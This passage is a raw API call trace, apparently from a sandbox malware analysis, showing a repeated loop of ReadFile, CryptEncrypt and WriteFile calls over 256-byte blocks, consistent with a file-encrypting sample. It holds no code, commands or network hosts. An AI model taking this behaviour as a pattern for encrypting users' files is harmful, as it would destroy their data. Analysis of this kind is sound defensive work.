lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.782] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.782] GetLastError () returned 0x0 [0144.782] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.782] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.782] GetLastError () returned 0x0 [0144.782] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.782] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.782] GetLastError () returned 0x0 [0144.782] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.783] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.783] GetLastError () returned 0x0 [0144.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.783] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.783] GetLastError () returned 0x0 [0144.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.783] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.783] GetLastError () returned 0x0 [0144.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.783] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.783] GetLastError () returned 0x0 [0144.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.783] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.783] GetLastError () returned 0x0 [0144.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.783] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.783] GetLastError () returned 0x0 [0144.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.784] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.784] GetLastError () returned 0x0 [0144.784] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.784] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.784] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.784] GetLastError () returned 0x0 [0144.784] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.784] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.784] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.784] GetLastError () returned 0x0 [0144.784] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.784] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.784] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.784] GetLastError () returned 0x0 [0144.784] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.784] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.784] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.784] GetLastError () returned 0x0 [0144.784] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.784] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.784] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.784] GetLastError () returned 0x0 [0144.784] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.784] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.785] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.785] GetLastError () returned 0x0 [0144.785] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.785] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.785] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.785] GetLastError () returned 0x0 [0144.785] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.785] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.785] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.785] GetLastError () returned 0x0 [0144.785] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.785] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.785] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.785] GetLastError () returned 0x0 [0144.785] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.785] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.785] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.785] GetLastError () returned 0x0 [0144.785] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.785] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.785] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.785] GetLastError () returned 0x0 [0144.785] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.785] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.785] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.785] GetLastError () returned 0x0 [0144.785] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.786] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.786] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.786] GetLastError () returned 0x0 [0144.786] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.786] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.786] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.786] GetLastError () returned 0x0 [0144.786] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.786] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.786] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.786] GetLastError () returned 0x0 [0144.786] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.786] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.786] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.786] GetLastError () returned 0x0 [0144.786] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.786] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.786] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.786] GetLastError () returned 0x0 [0144.786] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.786] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.786] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.786] GetLastError () returned 0x0 [0144.786] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.786] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.786] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.786] GetLastError () returned 0x0 [0144.787] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.787] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.787] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.787] GetLastError () returned 0x0 [0144.787] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.787] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.787] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.787] GetLastError () returned 0x0 [0144.787] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.787] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.787] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.787] GetLastError () returned 0x0 [0144.787] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.787] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.787] CryptEncrypt (in: 